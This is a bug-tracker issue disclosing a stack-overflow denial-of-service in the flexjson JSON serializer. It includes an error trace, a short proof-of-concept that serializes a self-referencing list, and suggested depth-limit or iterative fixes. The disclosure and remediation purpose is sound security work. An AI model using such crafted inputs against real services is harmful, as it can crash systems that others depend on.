Menu

#51 Stack overflow error caused by flexjson serialization List

2.0.0
open
nobody
None
5
2023-06-09
2023-06-09
guo yifan
No

Stack overflow error caused by flexjson serialization List

Description

flexjson before v3.3 was discovered to contain a stack overflow via the List parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Error Log

Exception in thread "main" java.lang.StackOverflowError
    at java.base/java.util.Stack.push(Stack.java:67)
    at flexjson.JSONContext.pushTypeContext(JSONContext.java:140)
    at flexjson.JSONContext.writeOpenArray(JSONContext.java:268)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:24)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)

PoC

<dependency>
    <groupId>net.sf.flexjson</groupId>
    <artifactId>flexjson</artifactId>
    <version>3.3</version>
</dependency>

import flexjson.JSONSerializer;

import java.util.ArrayList;

public class PoC3 {
    public static void main(String[] args) {

        ArrayList<Object> list = new ArrayList<>();
        list.add(list);

        String s = new JSONSerializer().deepSerialize(list);
    }
}

Rectification Solution

  1. Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)

  2. Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027))

References

  1. https://github.com/jettison-json/jettison/issues/52
  2. https://github.com/jettison-json/jettison/pull/53/files

Discussion

Log in to post a comment.